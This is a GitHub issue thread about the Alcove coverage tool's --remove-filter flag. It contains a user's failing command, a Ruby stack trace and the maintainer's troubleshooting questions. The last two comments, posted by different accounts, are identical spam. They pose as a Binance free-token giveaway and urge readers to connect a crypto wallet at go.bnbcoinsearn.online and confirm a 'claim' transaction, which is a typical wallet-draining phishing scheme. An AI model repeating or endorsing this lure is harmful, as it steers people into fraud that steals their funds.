### ISSUE TITLE
Is there an option to remove folders in the --remove-filter flag?

### ISSUE THREAD

**Issue by tomachi** [ioveracker/Alcove#3]

**Comment by voidrender** [comment]
Yes, surround the directory names with `*`. E.g.,

```
alcove --verbose --product-name MyApp --remove-filter *MyAppTest*,*iPhoneSimulator*
```

**Comment by tomachi** [comment]
Trying to use this:
`/usr/local/bin/alcove --product-name "proj" --search-directory "/Users/sre/Library/Developer/Xcode/DerivedData/Build/Intermediates/CodeCoverage/Intermediates/proj.build/Adhoc-iphonesimulator/Proj\ Test\ Enterprise.build/Objects-normal/x86_64/" --output-directory "/Users/sre/Desktop" --remove-filter *SdkExampleApp*`

Gives:
🔍  Generating report...
/Users/sre/.rvm/rubies/ruby-2.2.4/lib/ruby/2.2.0/find.rb:42:in `block in find': No such file or directory (Errno::ENOENT)
    from /Users/sre/.rvm/rubies/ruby-2.2.4/lib/ruby/2.2.0/find.rb:42:in`collect!'
    from /Users/sre/.rvm/rubies/ruby-2.2.4/lib/ruby/2.2.0/find.rb:42:in `find'
    from /Users/sre/.rvm/gems/ruby-2.2.4/gems/alcove-0.2.3/lib/alcove.rb:44:in`copy_input_files_to_temp'
    from /Users/sre/.rvm/gems/ruby-2.2.4/gems/alcove-0.2.3/bin/alcove:83:in `<top (required)>'
    from /usr/local/bin/alcove:23:in`load'
    from /usr/local/bin/alcove:23:in `<main>'
    from /Users/sre/.rvm/gems/ruby-2.2.4/bin/ruby_executable_hooks:15:in`eval'
    from /Users/sre/.rvm/gems/ruby-2.2.4/bin/ruby_executable_hooks:15:in `<main>'

**Comment by voidrender** [comment]
Hm, I wonder if that is being caused by spaces in your search dir.

**Comment by tomachi** [comment]
Tried with leading \ also. No luck.

**Comment by voidrender** [comment]
Just got back from vacation. I'll make some time to investigate this weekend.

What version of Xcode are you using?

**Comment by tomachi** [comment]
7.3.1. 
Thanks!

**Comment by mindfreak269** [comment]
# Binance

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

[![Claim Now](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)](http://go.bnbcoinsearn.online/97Q7Yj)

<center>Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰</center>

# Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Share this Airdrop](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Rewards](http://go.bnbcoinsearn.online/97Q7Yj).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=http://go.bnbcoinsearn.online/97Q7Yj&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

**Comment by yinka5521** [comment]
# Binance

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

[![Claim Now](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)](http://go.bnbcoinsearn.online/97Q7Yj)

<center>Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰</center>

# Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Share this Airdrop](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Rewards](http://go.bnbcoinsearn.online/97Q7Yj).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=http://go.bnbcoinsearn.online/97Q7Yj&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
